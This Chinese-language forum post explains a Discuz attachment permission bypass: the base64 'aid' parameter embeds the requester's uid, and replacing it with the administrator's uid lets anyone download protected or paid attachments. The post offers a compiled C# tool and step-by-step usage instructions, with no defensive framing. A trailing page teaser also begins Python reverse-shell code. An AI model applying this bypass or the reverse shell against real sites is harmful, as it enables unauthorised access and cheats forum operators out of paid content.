最近关注的一个discuz平衡权限漏洞,可以绕过附件下载权限达到免费下载附件的目的。于是,自己用C#开发了一个小程序,给大家编译好的exe文件供参考。
0x01 原理解析
附件的url类似于这样 http://sb.f4ck.org/forum.php?mod=attachment&aid=MjMzMDZ8MDY4OTkzN2Z8MTM5NDI5OTk2MHwzNTUwfDEyMTgx,aid是一个base64编码过的字符串,其中包含了你的uid。我们只需要把这个uid替换成管理员的uid,就能轻松绕过权限控制,直接下载附件了。
0x02 使用方法参考
01.找到要下载的附件,右键属性,拷贝其url:
02.粘贴进软件中。这个时候请注意了,其中要填写一个uid,这个uid默认为1。这个uid代表着你用哪个用户的身份下载此附件,一般肯定用管理员身份下载,而通常管理员uid都是1。但也可能有例外,所以使用者需要根据实际情况填写此uid。
如何查看管理员uid,不用我教吧。
03.点击下载,如果没有看到扣金币的画面而且正常下载,说明成功。
程序下载在附件中。
附件:
by the way,最后说明一下,如果该附件设置了“需要购买”的话,部分论坛(比如法客)是不能看到下载地址的。需要购买了以后才能看到下载地址。
python在linux下的反弹shell代码我相信很多人都见过: import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.c…
请登录后发表评论
注册